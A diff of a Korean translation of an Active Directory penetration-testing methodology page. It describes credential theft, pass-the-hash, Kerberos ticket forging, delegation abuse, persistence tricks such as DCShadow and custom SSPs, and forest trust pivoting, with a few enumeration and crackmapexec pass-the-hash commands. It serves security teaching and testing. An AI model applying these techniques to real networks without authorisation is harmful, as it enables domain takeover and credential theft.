 ../ntlm/places-to-steal-ntlm-creds.md
@@ -141,7 +141,7 @@ password-spraying.md
 
 ## 자격 증명/세션으로 활성 디렉토리 열거하기
 
-이 단계에서는 **유효한 도메인 계정의 자격 증명이나 세션을 손상시켜야** 합니다. 유효한 자격 증명이나 도메인 사용자로서의 쉘이 있다면, **이전에 제시된 옵션이 여전히 다른 사용자를 손상시키는 옵션임을 기억해야 합니다**.
+이 단계에서는 **유효한 도메인 계정의 자격 증명이나 세션을 손상시켜야** 합니다. 유효한 자격 증명이나 도메인 사용자로서의 쉘이 있다면, **이전에 제시된 옵션이 여전히 다른 사용자를 손상시키는 옵션임을 기억해야** 합니다.
 
 인증된 열거를 시작하기 전에 **Kerberos 더블 홉 문제**가 무엇인지 알아야 합니다.
 
@@ -151,14 +151,14 @@ kerberos-double-hop-problem.md
 
 ### 열거
 
-계정을 손상시키는 것은 **전체 도메인을 손상시키기 시작하는 큰 단계**입니다. 이제 **Active Directory 열거**를 시작할 수 있습니다:
+계정을 손상시키는 것은 **전체 도메인을 손상시키기 위한 큰 단계**입니다. 왜냐하면 **Active Directory 열거**를 시작할 수 있기 때문입니다:
 
 [**ASREPRoast**](asreproast.md)와 관련하여 이제 모든 가능한 취약한 사용자를 찾을 수 있으며, [**Password Spraying**](password-spraying.md)와 관련하여 손상된 계정의 비밀번호, 빈 비밀번호 및 새로운 유망한 비밀번호를 시도할 수 있습니다.
 
 - [**CMD를 사용하여 기본 정찰 수행**](../basic-cmd-for-pentesters.md#domain-info)
 - [**powershell을 사용하여 정찰**](../basic-powershell-for-pentesters/)할 수도 있으며, 이는 더 은밀합니다.
 - [**powerview 사용**](../basic-powershell-for-pentesters/powerview.md)하여 더 자세한 정보를 추출할 수 있습니다.
-- 활성 디렉토리에서 정찰을 위한 또 다른 훌륭한 도구는 [**BloodHound**](bloodhound.md)입니다. 이는 **그리 은밀하지 않습니다** (사용하는 수집 방법에 따라 다름), 그러나 **그것에 대해 신경 쓰지 않는다면** 꼭 시도해 보세요. 사용자가 RDP할 수 있는 위치를 찾고, 다른 그룹으로 가는 경로를 찾는 등.
+- 활성 디렉토리에서 정찰을 위한 또 다른 훌륭한 도구는 [**BloodHound**](bloodhound.md)입니다. 이는 **그리 은밀하지 않습니다** (사용하는 수집 방법에 따라 다름), 그러나 **그것에 대해 신경 쓰지 않는다면** 꼭 시도해 보아야 합니다. 사용자가 RDP할 수 있는 위치를 찾고, 다른 그룹으로 가는 경로를 찾는 등.
 - **기타 자동화된 AD 열거 도구는:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
 - [**AD의 DNS 레코드**](ad-dns-records.md)도 흥미로운 정보를 포함할 수 있습니다.
 - 디렉토리를 열거하는 데 사용할 수 있는 **GUI 도구**는 **SysInternal** Suite의 **AdExplorer.exe**입니다.
@@ -167,7 +167,7 @@ kerberos-double-hop-problem.md
 - 자동화 도구를 시도할 수도 있습니다:
 - [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
 - [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
-- **모든 도메인 사용자 추출**
+- **모든 도메인 사용자 추출하기**
 
 Windows에서 도메인 사용자 이름을 얻는 것은 매우 쉽습니다 (`net user /domain`, `Get-DomainUser` 또는 `wmic useraccount get name,sid`). Linux에서는 `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` 또는 `enum4linux -a -u "user" -p "password" <DC IP>`를 사용할 수 있습니다.
 
@@ -242,12 +242,12 @@ printnightmare.md
 ### 해시 전달
 
 **사용자의 해시를 확보하면**, 이를 사용하여 **사용자를 가장할 수 있습니다.**\
-해시를 사용하여 **NTLM 인증을 수행하는** **도구**를 사용해야 하며, **또는** 새로운 **세션로그온**을 생성하고 **LSASS** 내부에 그 **해시를 주입**할 수 있습니다. 그러면 **NTLM 인증이 수행될 때** 그 **해시가 사용됩니다.** 마지막 옵션이 mimikatz가 하는 것입니다.\
+해시를 사용하여 **NTLM 인증을 수행하는** **도구**를 사용해야 하며, **또는** 새로운 **sessionlogon**을 생성하고 **LSASS** 내부에 그 **해시를 주입**할 수 있습니다. 그러면 **NTLM 인증이 수행될 때** 그 **해시가 사용됩니다.** 마지막 옵션이 mimikatz가 하는 일입니다.\
 [**자세한 정보는 이 페이지를 읽어보세요.**](../ntlm/#pass-the-hash)
 
 ### 해시 초과/키 전달
 
-이 공격은 **사용자 NTLM 해시를 사용하여 Kerberos 티켓을 요청하는** 것을 목표로 하며, 이는 일반적인 NTLM 프로토콜을 통한 해시 전달의 대안입니다. 따라서, 이는 NTLM 프로토콜이 비활성화되고 **Kerberos만 인증 프로토콜로 허용되는** 네트워크에서 특히 **유용할 수 있습니다.**
+이 공격은 **사용자 NTLM 해시를 사용하여 Kerberos 티켓을 요청하는** 것을 목표로 하며, 이는 일반적인 NTLM 프로토콜을 통한 해시 전달의 대안입니다. 따라서, NTLM 프로토콜이 비활성화되고 **Kerberos만 인증 프로토콜로 허용되는** 네트워크에서 특히 **유용할 수 있습니다.**
 
 {{#ref}}
 over-pass-the-hash-pass-the-key.md
@@ -274,8 +274,8 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
 
 ### MSSQL 남용 및 신뢰 링크
 
-사용자가 **MSSQL 인스턴스에 접근할 수 있는 권한**이 있다면, 그는 MSSQL 호스트에서 **명령을 실행**하거나 (SA로 실행 중인 경우) NetNTLM **해시**를 **탈취**하거나 심지어 **릴레이** **공격**을 수행할 수 있습니다.\
-또한, MSSQL 인스턴스가 다른 MSSQL 인스턴스에 의해 신뢰받는 경우(데이터베이스 링크). 사용자가 신뢰받는 데이터베이스에 대한 권한이 있다면, 그는 **신뢰 관계를 사용하여 다른 인스턴스에서도 쿼리를 실행할 수 있습니다**. 이러한 신뢰는 연결될 수 있으며, 어느 시점에서 사용자는 명령을 실행할 수 있는 잘못 구성된 데이터베이스를 찾을 수 있습니다.\
+사용자가 **MSSQL 인스턴스에 접근할 수 있는 권한**이 있다면, 그는 이를 사용하여 MSSQL 호스트에서 **명령을 실행**하거나 (SA로 실행 중인 경우), NetNTLM **해시**를 **탈취**하거나 심지어 **릴레이** **공격**을 수행할 수 있습니다.\
+또한, MSSQL 인스턴스가 다른 MSSQL 인스턴스에 의해 신뢰받는 경우(데이터베이스 링크). 사용자가 신뢰받는 데이터베이스에 대한 권한을 가지고 있다면, 그는 **신뢰 관계를 사용하여 다른 인스턴스에서도 쿼리를 실행할 수 있습니다**. 이러한 신뢰는 연결될 수 있으며, 어느 시점에서 사용자는 명령을 실행할 수 있는 잘못 구성된 데이터베이스를 찾을 수 있습니다.\
 **데이터베이스 간의 링크는 포리스트 신뢰를 넘어 작동합니다.**
 
 {{#ref}}
@@ -285,8 +285,8 @@ abusing-ad-mssql.md
 ### 제약 없는 위임
 
 [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) 속성을 가진 컴퓨터 객체를 발견하고 해당 컴퓨터에서 도메인 권한이 있다면, 컴퓨터에 로그인하는 모든 사용자의 TGT를 메모리에서 덤프할 수 있습니다.\
-따라서 **도메인 관리자가 컴퓨터에 로그인하면**, 그의 TGT를 덤프하고 [Pass the Ticket](pass-the-ticket.md)를 사용하여 그를 가장할 수 있습니다.\
-제약된 위임 덕분에 **프린트 서버를 자동으로 손상시킬 수 있습니다** (희망적으로 DC일 것입니다).
+따라서, **도메인 관리자가 컴퓨터에 로그인하면**, 그의 TGT를 덤프하고 [Pass the Ticket](pass-the-ticket.md)를 사용하여 그를 가장할 수 있습니다.\
+제약된 위임 덕분에 **프린트 서버를 자동으로 타겟팅**할 수도 있습니다(희망적으로 DC일 것입니다).
 
 {{#ref}}
 unconstrained-delegation.md
@@ -295,7 +295,7 @@ unconstrained-delegation.md
 ### 제약된 위임
 
 사용자 또는 컴퓨터가 "제약된 위임"을 허용받으면, **특정 서비스에 접근하기 위해 어떤 사용자를 가장할 수 있습니다**.\
-그런 다음, 이 사용자/컴퓨터의 **해시를 손상시키면** **모든 사용자를 가장할 수 있습니다** (도메인 관리자 포함) 특정 서비스에 접근할 수 있습니다.
+그런 다음, 이 사용자/컴퓨터의 **해시를 탈취**하면, **어떤 사용자**(도메인 관리자 포함)를 가장하여 특정 서비스에 접근할 수 있습니다.
 
 {{#ref}}
 constrained-delegation.md
@@ -311,7 +311,7 @@ resource-based-constrained-delegation.md
 
 ### ACL 남용
 
-손상된 사용자는 **도메인 객체에 대한 흥미로운 권한**을 가질 수 있으며, 이는 사용자가 **측면 이동**/**권한 상승**을 할 수 있게 해줍니다.
+탈취된 사용자는 **도메인 객체에 대한 흥미로운 권한**을 가질 수 있으며, 이는 사용자가 **측면 이동**/**권한 상승**을 할 수 있게 해줍니다.
 
 {{#ref}}
 acl-persistence-abuse/
@@ -319,7 +319,7 @@ acl-persistence-abuse/
 
 ### 프린터 스풀러 서비스 남용
 
-도메인 내에서 **스풀 서비스가 수신 대기 중인** 것을 발견하면, 이를 **남용하여 새로운 자격 증명을 획득하고** **권한을 상승**시킬 수 있습니다.
+도메인 내에서 **스풀 서비스가 수신 대기**하고 있는 것을 발견하면, 이를 **남용하여 새로운 자격 증명을 획득**하고 **권한을 상승**시킬 수 있습니다.
 
 {{#ref}}
 printers-spooler-service-abuse.md
@@ -327,8 +327,8 @@ printers-spooler-service-abuse.md
 
 ### 제3자 세션 남용
 
-**다른 사용자**가 **손상된** 머신에 **접근**하면, 메모리에서 **자격 증명을 수집**하고 심지어 **그들의 프로세스에 비콘을 주입**하여 그들을 가장할 수 있습니다.\
-일반적으로 사용자는 RDP를 통해 시스템에 접근하므로, 여기에서 제3자 RDP 세션에 대해 몇 가지 공격을 수행하는 방법을 제공합니다:
+**다른 사용자**가 **탈취된** 머신에 **접근**하면, 메모리에서 **자격 증명을 수집**하고 심지어 **그들의 프로세스에 비콘을 주입**하여 그들을 가장할 수 있습니다.\
+일반적으로 사용자는 RDP를 통해 시스템에 접근하므로, 여기에서 제3자 RDP 세션에 대한 몇 가지 공격을 수행하는 방법을 제공합니다:
 
 {{#ref}}
 rdp-sessions-abuse.md
@@ -336,15 +336,15 @@ rdp-sessions-abuse.md
 
 ### LAPS
 
-**LAPS**는 도메인에 가입된 컴퓨터에서 **로컬 관리자 비밀번호**를 관리하는 시스템을 제공하여, 비밀번호가 **무작위화**, 고유하며 자주 **변경**되도록 보장합니다. 이러한 비밀번호는 Active Directory에 저장되며, ACL을 통해 권한이 있는 사용자만 접근할 수 있습니다. 이러한 비밀번호에 접근할 수 있는 충분한 권한이 있으면, 다른 컴퓨터로 피벗할 수 있습니다.
+**LAPS**는 도메인에 가입된 컴퓨터에서 **로컬 관리자 비밀번호**를 관리하는 시스템을 제공하여, 비밀번호가 **무작위화**, 고유하며 자주 **변경**되도록 보장합니다. 이러한 비밀번호는 Active Directory에 저장되며, ACL을 통해 권한이 있는 사용자만 접근할 수 있도록 제어됩니다. 이러한 비밀번호에 접근할 수 있는 충분한 권한이 있으면, 다른 컴퓨터로 피벗할 수 있습니다.
 
 {{#ref}}
 laps.md
 {{#endref}}
 
-### 인증서 도난
+### 인증서 탈취
 
-**손상된 머신에서 인증서를 수집하는 것**은 환경 내에서 권한을 상승시키는 방법이 될 수 있습니다:
+**탈취된 머신에서 인증서를 수집**하는 것은 환경 내에서 권한을 상승시키는 방법이 될 수 있습니다:
 
 {{#ref}}
 ad-certificates/certificate-theft.md
@@ -366,9 +366,9 @@ ad-certificates/domain-escalation.md
 
 [**DCSync 공격에 대한 더 많은 정보는 여기에서 찾을 수 있습니다**](dcsync.md).
 
-[**NTDS.dit를 훔치는 방법에 대한 더 많은 정보는 여기에서 찾을 수 있습니다**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
+[**NTDS.dit를 탈취하는 방법에 대한 더 많은 정보는 여기에서 찾을 수 있습니다**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
 
-### 권한 상승을 통한 지속성
+### 권한 상승을 위한 지속성
 
 앞서 논의된 몇 가지 기술은 지속성에 사용될 수 있습니다.\
 예를 들어, 다음과 같이 할 수 있습니다:
@@ -393,7 +393,7 @@ Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdenti
 
 ### 실버 티켓
 
-**실버 티켓 공격**은 특정 서비스에 대한 **정당한 티켓 부여 서비스(TGS) 티켓**을 **NTLM 해시**를 사용하여 생성합니다 (예: **PC 계정의 해시**). 이 방법은 **서비스 권한에 접근하기 위해** 사용됩니다.
+**실버 티켓 공격**은 특정 서비스에 대한 **정당한 티켓 부여 서비스(TGS) 티켓**을 **NTLM 해시**를 사용하여 생성합니다(예: **PC 계정의 해시**). 이 방법은 **서비스 권한에 접근하기 위해** 사용됩니다.
 
 {{#ref}}
 silver-ticket.md
@@ -403,7 +403,7 @@ silver-ticket.md
 
 **골든 티켓 공격**은 공격자가 Active Directory(AD) 환경에서 **krbtgt 계정의 NTLM 해시**에 접근하는 것을 포함합니다. 이 계정은 모든 **티켓 부여 티켓(TGT)**에 서명하는 데 사용되기 때문에 특별합니다. 이는 AD 네트워크 내에서 인증하는 데 필수적입니다.
 
-공격자가 이 해시를 얻으면, 그들은 선택한 모든 계정에 대한 **TGT**를 생성할 수 있습니다 (실버 티켓 공격).
+공격자가 이 해시를 얻으면, 그들은 선택한 모든 계정에 대한 **TGT**를 생성할 수 있습니다(실버 티켓 공격).
 
 {{#ref}}
 golden-ticket.md
@@ -411,7 +411,7 @@ golden-ticket.md
 
 ### 다이아몬드 티켓
 
-이들은 일반적인 골든 티켓 탐지 메커니즘을 **우회하는 방식으로 위조된** 골든 티켓과 같습니다.
+이들은 일반적인 골든 티켓 탐지 메커니즘을 **우회하는 방식으로 위조된 골든 티켓**과 같습니다.
 
 {{#ref}}
 diamond-ticket.md
@@ -419,7 +419,7 @@ diamond-ticket.md
 
 ### **인증서 계정 지속성**
 
-**계정의 인증서를 보유하거나 요청할 수 있는 것**은 사용자의 계정에 지속할 수 있는 매우 좋은 방법입니다 (비밀번호를 변경하더라도):
+**계정의 인증서를 보유하거나 요청할 수 있는 것은** 사용자의 계정에 지속적으로 남아 있을 수 있는 매우 좋은 방법입니다(비밀번호를 변경하더라도):
 
 {{#ref}}
 ad-certificates/account-persistence.md
@@ -427,7 +427,7 @@ ad-certificates/account-persistence.md
 
 ### **인증서 도메인 지속성**
 
-**인증서를 사용하여 도메인 내에서 높은 권한으로 지속하는 것도 가능합니다:**
+**인증서를 사용하여 도메인 내에서 높은 권한으로 지속할 수도 있습니다:**
 
 {{#ref}}
 ad-certificates/domain-persistence.md
@@ -435,13 +435,13 @@ ad-certificates/domain-persistence.md
 
 ### AdminSDHolder 그룹
 
-Active Directory의 **AdminSDHolder** 객체는 **특권 그룹**(예: 도메인 관리자 및 엔터프라이즈 관리자)의 보안을 보장하기 위해 이러한 그룹에 표준 **액세스 제어 목록(ACL)**을 적용하여 무단 변경을 방지합니다. 그러나 이 기능은 악용될 수 있습니다. 공격자가 AdminSDHolder의 ACL을 수정하여 일반 사용자에게 전체 접근 권한을 부여하면, 해당 사용자는 모든 특권 그룹에 대한 광범위한 제어를 얻게 됩니다. 이 보안 조치는 보호를 위한 것이지만, 면밀히 모니터링되지 않으면 불필요한 접근을 허용할 수 있습니다.
+Active Directory의 **AdminSDHolder** 객체는 **특권 그룹**(도메인 관리자 및 엔터프라이즈 관리자와 같은)의 보안을 보장하기 위해 이러한 그룹에 표준 **액세스 제어 목록(ACL)**을 적용하여 무단 변경을 방지합니다. 그러나 이 기능은 악용될 수 있습니다. 공격자가 AdminSDHolder의 ACL을 수정하여 일반 사용자에게 전체 접근 권한을 부여하면, 해당 사용자는 모든 특권 그룹에 대한 광범위한 제어를 얻게 됩니다. 이 보안 조치는 보호를 위한 것이지만, 면밀히 모니터링되지 않으면 불법적인 접근을 허용할 수 있습니다.
 
 [**AdminDSHolder 그룹에 대한 더 많은 정보는 여기에서 확인할 수 있습니다.**](privileged-groups-and-token-privileges.md#adminsdholder-group)
 
 ### DSRM 자격 증명
 
-모든 **도메인 컨트롤러(DC)** 내에는 **로컬 관리자** 계정이 존재합니다. 이러한 머신에서 관리자 권한을 얻으면 **mimikatz**를 사용하여 로컬 관리자 해시를 추출할 수 있습니다. 이후, 이 비밀번호를 **사용할 수 있도록 활성화**하기 위해 레지스트리 수정을 해야 하며, 이를 통해 로컬 관리자 계정에 원격으로 접근할 수 있습니다.
+모든 **도메인 컨트롤러(DC)** 내에는 **로컬 관리자** 계정이 존재합니다. 이러한 머신에서 관리자 권한을 얻으면, **mimikatz**를 사용하여 로컬 관리자 해시를 추출할 수 있습니다. 이후, 이 비밀번호를 **사용할 수 있도록 활성화**하기 위해 레지스트리 수정을 해야 하며, 이를 통해 로컬 관리자 계정에 원격으로 접근할 수 있습니다.
 
 {{#ref}}
 dsrm-credentials.md
@@ -449,7 +449,7 @@ dsrm-credentials.md
 
 ### ACL 지속성
 
-특정 도메인 객체에 대해 **사용자에게** 일부 **특별 권한**을 부여하여 사용자가 **미래에 권한을 상승**시킬 수 있도록 할 수 있습니다.
+특정 도메인 객체에 대해 **사용자에게 특별 권한**을 부여하여 사용자가 **미래에 권한을 상승**시킬 수 있도록 할 수 있습니다.
 
 {{#ref}}
 acl-persistence-abuse/
@@ -457,7 +457,7 @@ acl-persistence-abuse/
 
 ### 보안 설명자
 
-**보안 설명자**는 **객체**가 **객체**에 대해 가진 **권한**을 **저장**하는 데 사용됩니다. 객체의 **보안 설명자**에 **조금만 변경**을 가하면, 특권 그룹의 구성원이 되지 않고도 해당 객체에 대한 매우 흥미로운 권한을 얻을 수 있습니다.
+**보안 설명자**는 **객체**가 **객체**에 대해 가진 **권한**을 **저장**하는 데 사용됩니다. 객체의 **보안 설명자**에 **조금만 변경**을 가하면, 특권 그룹의 구성원이 되지 않고도 해당 객체에 대해 매우 흥미로운 권한을 얻을 수 있습니다.
 
 {{#ref}}
 security-descriptors.md
@@ -474,7 +474,7 @@ skeleton-key.md
 ### 사용자 정의 SSP
 
 [SSP(보안 지원 제공자)가 무엇인지 여기에서 알아보세요.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
-자신의 **SSP**를 생성하여 **자격 증명**을 **명확한 텍스트**로 **캡처**할 수 있습니다.\\
+자신의 **SSP**를 생성하여 **명확한 텍스트**로 머신에 접근하는 데 사용되는 **자격 증명**을 **캡처**할 수 있습니다.\\
 
 {{#ref}}
 custom-ssp.md
@@ -482,7 +482,7 @@ custom-ssp.md
 
 ### DCShadow
 
-AD에 **새 도메인 컨트롤러**를 등록하고 이를 사용하여 지정된 객체에 **속성**(SIDHistory, SPNs...)을 **푸시**합니다 **수정**에 대한 **로그**를 남기지 않고. **DA** 권한이 필요하며 **루트 도메인** 내에 있어야 합니다.\
+AD에 **새 도메인 컨트롤러**를 등록하고 이를 사용하여 지정된 객체에 **속성**(SIDHistory, SPNs...)을 **푸시**합니다. 이 과정에서 **수정**에 대한 **로그**를 남기지 않습니다. **DA** 권한이 필요하며 **루트 도메인** 내에 있어야 합니다.\
 잘못된 데이터를 사용하면, 매우 불쾌한 로그가 나타날 수 있습니다.
 
 {{#ref}}
@@ -500,22 +500,22 @@ laps.md
 
 ## 포리스트 권한 상승 - 도메인 신뢰
 
-Microsoft는 **포리스트**를 보안 경계로 간주합니다. 이는 **단일 도메인을 손상시키는 것이 전체 포리스트가 손상될 수 있음을 의미합니다**.
+Microsoft는 **포리스트**를 보안 경계로 간주합니다. 이는 **단일 도메인을 타겟팅하는 것이 전체 포리스트가 타겟팅될 수 있음을 의미합니다**.
 
 ### 기본 정보
 
-[**도메인 신뢰**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>)는 한 **도메인**의 사용자가 다른 **도메인**의 리소스에 접근할 수 있도록 하는 보안 메커니즘입니다. 이는 본질적으로 두 도메인의 인증 시스템 간의 연결을 생성하여 인증 검증이 원활하게 흐를 수 있도록 합니다. 도메인이 신뢰를 설정하면, 그들은 신뢰의 무결성에 중요한 특정 **키**를 **도메인 컨트롤러(DC)** 내에서 교환하고 유지합니다.
+[**도메인 신뢰**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>)는 한 **도메인**의 사용자가 다른 **도메인**의 리소스에 접근할 수 있도록 하는 보안 메커니즘입니다. 이는 두 도메인의 인증 시스템 간의 연결을 생성하여 인증 검증이 원활하게 흐를 수 있도록 합니다. 도메인이 신뢰를 설정하면, 그들은 특정 **키**를 **도메인 컨트롤러(DC)** 내에서 교환하고 유지하여 신뢰의 무결성을 보장합니다.
 
-일반적인 시나리오에서 사용자가 **신뢰된 도메인**의 서비스에 접근하려는 경우, 먼저 자신의 도메인 DC에서 **인터-렐름 TGT**라는 특별한 티켓을 요청해야 합니다. 이 TGT는 두 도메인이 합의한 공유 **키**로 암호화됩니다. 사용자는 이 TGT를 **신뢰된 도메인의 DC**에 제시하여 서비스 티켓(**TGS**)을 받습니다. 신뢰된 도메인의 DC가 인터-렐름 TGT를 성공적으로 검증하면, TGS를 발급하여 사용자가 서비스에 접근할 수 있도록 합니다.
+일반적인 시나리오에서 사용자가 **신뢰된 도메인**의 서비스에 접근하려면, 먼저 자신의 도메인 DC로부터 **인터-렐름 TGT**라는 특별한 티켓을 요청해야 합니다. 이 TGT는 두 도메인이 합의한 공유 **키**로 암호화됩니다. 사용자는 이 TGT를 **신뢰된 도메인의 DC**에 제시하여 서비스 티켓(**TGS**)을 받습니다. 신뢰된 도메인의 DC가 인터-렐름 TGT를 성공적으로 검증하면, TGS를 발급하여 사용자가 서비스에 접근할 수 있도록 합니다.
 
 **단계**:
 
-1. **도메인 1**의 **클라이언트 컴퓨터**가 **NTLM 해시**를 사용하여 **도메인 컨트롤러(DC1)**에서 **티켓 부여 티켓(TGT)**을 요청합니다.
+1. **도메인 1**의 **클라이언트 컴퓨터**가 **도메인 컨트롤러(DC1)**로부터 **티켓 부여 티켓(TGT)**을 요청하는 과정이 시작됩니다.
 2. 클라이언트가 성공적으로 인증되면 DC1은 새로운 TGT를 발급합니다.
-3. 클라이언트는 **도메인 2**의 리소스에 접근하기 위해 DC1에서 **인터-렐름 TGT**를 요청합니다.
-4. 인터-렐름 TGT는 DC1과 DC2 간의 양방향 도메인 신뢰의 일환으로 공유된 **신뢰 키**로 암호화됩니다.
+3. 클라이언트는 **도메인 2**의 리소스에 접근하기 위해 DC1으로부터 **인터-렐름 TGT**를 요청합니다.
+4. 인터-렐름 TGT는 두 방향 도메인 신뢰의 일환으로 DC1과 DC2 간에 공유된 **신뢰 키**로 암호화됩니다.
 5. 클라이언트는 인터-렐름 TGT를 **도메인 2의 도메인 컨트롤러(DC2)**로 가져갑니다.
-6. DC2는 공유된 신뢰 키를 사용하여 인터-렐름 TGT를 검증하고, 유효한 경우 클라이언트가 접근하려는 도메인 2의 서버에 대한 **티켓 부여 서비스(TGS)**를 발급합니다.
+6. DC2는 공유된 신뢰 키를 사용하여 인터-렐름 TGT를 검증하고, 유효한 경우 클라이언트가 접근하고자 하는 도메인 2의 서버에 대한 **티켓 부여 서비스(TGS)**를 발급합니다.
 7. 마지막으로 클라이언트는 이 TGS를 서버에 제시하여 도메인 2의 서비스에 접근합니다. 이 TGS는 서버의 계정 해시로 암호화되어 있습니다.
 
 ### 다양한 신뢰
@@ -526,30 +526,30 @@ Microsoft는 **포리스트**를 보안 경계로 간주합니다. 이는 **단
 
 **다양한 신뢰 관계**
 
-- **부모-자식 신뢰**: 이는 동일한 포리스트 내에서 일반적인 설정으로, 자식 도메인은 자동으로 부모 도메인과 양방향 전이 신뢰를 가집니다. 본질적으로 이는 인증 요청이 부모와 자식 간에 원활하게 흐를 수 있음을 의미합니다.
-- **교차 링크 신뢰**: "단축 신뢰"라고도 하며, 자식 도메인 간에 설정되어 참조 프로세스를 가속화합니다. 복잡한 포리스트에서는 인증 참조가 일반적으로 포리스트 루트로 올라갔다가 대상 도메인으로 내려가야 합니다. 교차 링크를 생성함으로써 여정을 단축할 수 있으며, 이는 지리적으로 분산된 환경에서 특히 유용합니다.
-- **외부 신뢰**: 이는 서로 관련이 없는 도메인 간에 설정되며 본질적으로 비전이적입니다. [Microsoft의 문서에 따르면](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), 외부 신뢰는 현재 포리스트 외부의 도메인에서 리소스에 접근하는 데 유용하며, 포리스트 신뢰로 연결되지 않은 도메인에서 유용합니다. SID 필터링을 통해 보안이 강화됩니다.
-- **트리 루트 신뢰**: 이러한 신뢰는 포리스트 루트 도메인과 새로 추가된 트리 루트 간에 자동으로 설정됩니다. 일반적으로 자주 발생하지 않지만, 트리 루트 신뢰는 포리스트에 새로운 도메인 트리를 추가하는 데 중요하며, 이를 통해 고유한 도메인 이름을 유지하고 양방향 전이성을 보장합니다. [Microsoft의 가이드에서 더 많은 정보를 찾을 수 있습니다](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
-- **포리스트 신뢰**: 이 유형의 신뢰는 두 포리스트 루트 도메인 간의 양방향 전이 신뢰로, SID 필터링을 통해 보안 조치를 강화합니다.
+- **부모-자식 신뢰**: 이는 동일한 포리스트 내에서 일반적인 설정으로, 자식 도메인은 자동으로 부모 도메인과 2방향 전이 신뢰를 가집니다. 본질적으로 이는 인증 요청이 부모와 자식 간에 원활하게 흐를 수 있음을 의미합니다.
+- **교차 링크 신뢰**: "단축 신뢰"라고도 하며, 자식 도메인 간에 설정되어 참조 프로세스를 가속화합니다. 복잡한 포리스트에서는 인증 참조가 일반적으로 포리스트 루트로 올라갔다가 목표 도메인으로 내려가야 합니다. 교차 링크를 생성함으로써 이 여정을 단축할 수 있으며, 이는 지리적으로 분산된 환경에서 특히 유용합니다.
+- **외부 신뢰**: 이는 서로 관련이 없는 도메인 간에 설정되며 본질적으로 비전이적입니다. [Microsoft의 문서](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>)에 따르면, 외부 신뢰는 현재 포리스트 외부의 도메인에서 리소스에 접근하는 데 유용하며, 포리스트 신뢰로 연결되지 않은 도메인에 해당합니다. SID 필터링을 통해 보안이 강화됩니다.
+- **트리 루트 신뢰**: 이러한 신뢰는 포리스트 루트 도메인과 새로 추가된 트리 루트 간에 자동으로 설정됩니다. 일반적으로 자주 발생하지 않지만, 트리 루트 신뢰는 포리스트에 새로운 도메인 트리를 추가하는 데 중요하며, 이를 통해 고유한 도메인 이름을 유지하고 2방향 전이성을 보장합니다. [Microsoft의 가이드](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>)에서 더 많은 정보를 찾을 수 있습니다.
+- **포리스트 신뢰**: 이 유형의 신뢰는 두 포리스트 루트 도메인 간의 2방향 전이 신뢰로, 보안 조치를 강화하기 위해 SID 필터링을 시행합니다.
 - **MIT 신뢰**: 이러한 신뢰는 비 Windows, [RFC4120 준수](https://tools.ietf.org/html/rfc4120) Kerberos 도메인과 설정됩니다. MIT 신뢰는 좀 더 전문화되어 있으며, Windows 생태계 외부의 Kerberos 기반 시스템과의 통합이 필요한 환경에 맞춰져 있습니다.
 
 #### **신뢰 관계의 다른 차이점**
 
-- 신뢰 관계는 **전이적**일 수 있습니다 (A가 B를 신뢰하고, B가 C를 신뢰하면, A가 C를 신뢰함) 또는 **비전이적**일 수 있습니다.
-- 신뢰 관계는 **양방향 신뢰**(서로를 신뢰함) 또는 **일방향 신뢰**(오직 한 쪽만 다른 쪽을 신뢰함)로 설정될 수 있습니다.
+- 신뢰 관계는 **전이적**일 수 있습니다(A가 B를 신뢰하고, B가 C를 신뢰하면, A가 C를 신뢰함) 또는 **비전이적**일 수 있습니다.
+- 신뢰 관계는 **양방향 신뢰**(서로를 신뢰)로 설정되거나 **일방향 신뢰**(한 쪽만 다른 쪽을 신뢰)로 설정될 수 있습니다.
 
 ### 공격 경로
 
 1. **신뢰 관계를 열거**합니다.
-2. 어떤 **보안 주체**(사용자/그룹/컴퓨터)가 **다른 도메인의 리소스에 접근**할 수 있는지 확인합니다. ACE 항목이나 다른 도메인의 그룹에 속해 있을 수 있습니다. **도메인 간의 관계**를 찾아보세요 (신뢰가 이 목적을 위해 생성되었을 가능성이 높습니다).
+2. 어떤 **보안 주체**(사용자/그룹/컴퓨터)가 **다른 도메인의 리소스**에 **접근**할 수 있는지 확인합니다. ACE 항목이나 다른 도메인의 그룹에 속해 있을 수 있습니다. **도메인 간의 관계**를 찾아보세요(신뢰가 이 목적을 위해 생성되었을 가능성이 높습니다).
 3. 이 경우 kerberoast가 또 다른 옵션이 될 수 있습니다.
-4. **계정을 손상시켜** 도메인 간에 **피벗**할 수 있습니다.
+4. **계정을 타겟팅**하여 **도메인 간에 피벗**할 수 있습니다.
 
 공격자는 다음 세 가지 주요 메커니즘을 통해 다른 도메인의 리소스에 접근할 수 있습니다:
 
 - **로컬 그룹 구성원 자격**: 주체는 서버의 "관리자" 그룹과 같은 머신의 로컬 그룹에 추가될 수 있으며, 이를 통해 해당 머신에 대한 상당한 제어를 부여받습니다.
-- **외부 도메인 그룹 구성원 자격**: 주체는 외부 도메인 내의 그룹의 구성원일 수도 있습니다. 그러나 이 방법의 효과는 신뢰의 성격과 그룹의 범위에 따라 달라집니다.
